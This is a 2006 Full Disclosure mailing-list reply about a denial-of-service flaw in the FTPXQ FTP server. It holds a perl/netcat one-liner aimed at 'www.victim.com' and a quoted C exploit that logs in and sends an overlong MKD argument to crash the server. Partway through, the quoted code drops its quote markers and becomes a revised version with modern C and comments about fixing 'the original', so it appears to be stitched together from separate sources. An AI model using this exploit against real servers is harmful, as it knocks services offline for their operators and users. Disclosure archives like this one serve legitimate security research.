Date: Thu, 26 Oct 2006 19:28:27 +0200 From: Bernhard Mueller <research@...-consult.com> To: Full Disclosure <full-disclosure@...ts.grok.org.uk> Subject: Re: FTPXQ Denial of service exploit. Hello, And here's the bash/perl port (same USER/PASS/MKD sequence with a 255-byte directory name; the perl program has to be single-quoted so the shell passes the inner double quotes and the "\r\n" escapes through to perl unchanged): sk0L@...yl0n ~ $ perl -e 'print "USER lol\r\nPASS lol\r\nMKD ".("A"x255)."\r\n"' | nc www.victim.com 21 Cheers, Bernhard Federico Fazzi wrote: > /* > * 0xf_ftpxq.c - FTPXQ Denial of service exploit. > * Federico Fazzi <federico@...istici.org> > * > * advisory by Eric Sesterhenn. > * -- Server built using the WinsockQ from DataWizard Technologies. A > security > * -- vulnerability in the product allows remote attackers to overflow an > * -- internal buffer by providing an overly long "make directory" request. > * > * r20061025. > */ > > #include <stdio.h> > #include <stdlib.h> > #include <unistd.h> > #include <string.h> > #include <netdb.h> > #include <arpa/inet.h> > #include <sys/types.h> > #include <netinet/in.h> > #include <sys/socket.h> > > // AAAAAAAAAAAAAAAA..AA*255 in hex format.
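/*
 * Payload for the MKD argument: 255 x 0x41 ('A'), the "overly long
 * directory name" the advisory describes.  The _Static_assert below pins
 * the length at compile time so an editing slip cannot silently shorten
 * or lengthen it.
 */
enum { BOF_LEN = 255 };

char bof[] = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
             "\x41\x41\x41\x41\x41\x41\x41\x41";

_Static_assert(sizeof bof == BOF_LEN + 1,
               "bof must hold exactly 255 bytes plus the terminating NUL");

/*
 * Send all n bytes of p on sd, looping over short writes.
 * Returns 0 on success, -1 if send() fails or makes no progress.
 * MSG_NOSIGNAL (where available) keeps a peer that already crashed from
 * killing us with SIGPIPE before we can report the result.
 */
static int send_all(int sd, const char *p, size_t n)
{
    int flags = 0;
#ifdef MSG_NOSIGNAL
    flags = MSG_NOSIGNAL;
#endif
    while (n > 0) {
        ssize_t w = send(sd, p, n, flags);
        if (w <= 0)
            return -1;
        p += w;
        n -= (size_t)w;
    }
    return 0;
}

/*
 * Parse a decimal TCP port in 1..65535 from s into *port.
 * Returns 0 on success, -1 on junk, empty input or an out-of-range value
 * (atoi() would have silently produced 0 or a truncated value).
 */
static int parse_port(const char *s, unsigned short *port)
{
    char *end = NULL;
    long v = strtol(s, &end, 10);

    if (end == s || *end != '\0' || v < 1 || v > 65535)
        return -1;
    *port = (unsigned short)v;
    return 0;
}

/*
 * Format "<verb> <arg>\r\n" into buf (capacity cap).
 * Returns the line length, or -1 if it would not fit -- the line is never
 * silently truncated, because a truncated FTP command is a different
 * command.
 */
static int format_cmd(char *buf, size_t cap, const char *verb, const char *arg)
{
    int n = snprintf(buf, cap, "%s %s\r\n", verb, arg);

    if (n < 0 || (size_t)n >= cap)
        return -1;
    return n;
}

/*
 * Return 1 if s contains an FTP reply line starting with the 3-digit
 * code (i.e. code at the start of s or right after a '\n'), else 0.
 * Matching only at line start avoids false hits on digits inside reply
 * text such as a quoted directory name.
 */
static int has_reply_code(const char *s, const char *code)
{
    const char *p = s;

    while ((p = strstr(p, code)) != NULL) {
        if (p == s || p[-1] == '\n')
            return 1;
        p++;
    }
    return 0;
}

/*
 * FTPXQ "MKD" overflow denial-of-service proof of concept.
 *
 * Logs in with the supplied credentials, sends an MKD whose argument is
 * the 255-byte payload, then sends QUIT and drains the replies.  A server
 * that survives MKD answers QUIT with 221 and closes; one that crashed
 * never gets that far, so the connection ends without a 221.
 *
 * This is a DoS PoC only.  FTP credentials go over the wire in cleartext,
 * so use throw-away test credentials, and run it only against a host you
 * are authorised to test.  Exit status 1 on a setup or send failure.
 */
int main(int argc, char **argv)
{
    int sd;
    int len;
    ssize_t got;
    unsigned short port;
    struct sockaddr_in saddr;
    struct hostent *he;
    char buf[512], tmpbuf[128];
    int survived = 0;   /* set once a 221 (the reply to QUIT) is seen */

    if (argc != 5) {
        printf("FTPXQ Server - Denial of service exploit.\n"
               "Federico Fazzi <federico@...istici.org>\n\n"
               "usage: %s <hostname> <port> <user> <password>\n", argv[0]);
        exit(1);
    }

    if (parse_port(argv[2], &port) != 0) {
        fprintf(stderr, "invalid port: %s\n", argv[2]);
        exit(1);
    }

    /* gethostbyname() reports failure through h_errno, not errno, so the
     * old perror() printed whatever unrelated errno happened to be set. */
    if ((he = gethostbyname(argv[1])) == NULL) {
        fprintf(stderr, "gethostbyname(): cannot resolve %s\n", argv[1]);
        exit(1);
    }

    /* Only an AF_INET record fits sin_addr; copying h_length bytes without
     * this check would overrun it for any other family or length. */
    if (he->h_addrtype != AF_INET
        || (size_t)he->h_length != sizeof saddr.sin_addr
        || he->h_addr_list == NULL || he->h_addr_list[0] == NULL) {
        fprintf(stderr, "gethostbyname(): no IPv4 address for %s\n", argv[1]);
        exit(1);
    }

    if ((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("socket()");
        exit(1);
    }

    memset(&saddr, 0, sizeof saddr);
    saddr.sin_family = AF_INET;
    memcpy(&saddr.sin_addr, he->h_addr_list[0], sizeof saddr.sin_addr);
    saddr.sin_port = htons(port);

    if (connect(sd, (struct sockaddr *)&saddr, sizeof saddr) == -1) {
        perror("connect()");
        close(sd);
        exit(1);
    }
    printf("FTPXQ Server - Denial of service exploit.\n"
           "Federico Fazzi <federico@...istici.org>\n"
           "---------------------------------------\n");
    puts("connecting..\t\t done");

    /* USER / PASS are built with a bounded snprintf(): argv[3] and argv[4]
     * are unbounded, and the original sprintf() into buf[512] could
     * overflow our own stack. */
    if ((len = format_cmd(buf, sizeof buf, "USER", argv[3])) < 0
        || send_all(sd, buf, (size_t)len) != 0)
        goto send_failed;
    puts("sending USER data..\t done");

    if ((len = format_cmd(buf, sizeof buf, "PASS", argv[4])) < 0
        || send_all(sd, buf, (size_t)len) != 0)
        goto send_failed;
    puts("sending PASS data..\t done");

    /* The original formatted "MKD %s" into buf and then wrote bof instead,
     * so the server only ever received a bare run of 'A's with neither the
     * command verb nor a CRLF.  Send the formatted line, terminator and all. */
    if ((len = format_cmd(buf, sizeof buf, "MKD", bof)) < 0
        || send_all(sd, buf, (size_t)len) != 0)
        goto send_failed;
    puts("sending MKD bof string.. done");

    /* QUIT: a failure here is expected when the peer is already gone, so
     * it is deliberately not treated as an error. */
    (void)send_all(sd, "QUIT\r\n", 6);

    /* Drain every reply until the server closes, echoing them so the
     * operator can see a 530 (login rejected -- MKD then never reached the
     * vulnerable path), the reply to MKD, and the 221 from QUIT.  The
     * original read() exactly once, which always returned the 220 banner,
     * so it reported "not vulnerable" regardless of what happened later. */
    while ((got = read(sd, tmpbuf, sizeof tmpbuf - 1)) > 0) {
        tmpbuf[got] = '\0';
        fputs(tmpbuf, stdout);
        /* A 221 split across two reads is missed and the server is then
         * reported as down; the echoed replies let the operator check. */
        if (has_reply_code(tmpbuf, "221"))
            survived = 1;
    }
    fflush(stdout);

    /* read() < 0 (typically a reset) after MKD is the usual crash
     * signature, but it can also be a plain network error -- hence the
     * errno text alongside the verdict. */
    if (got < 0)
        perror("read()");

    if (survived)
        puts("[!] server doesn't vulnerable");
    else
        puts("[+] server getting down.. done");
    close(sd);

    return(0);

send_failed:
    perror("send()");
    close(sd);
    return 1;
}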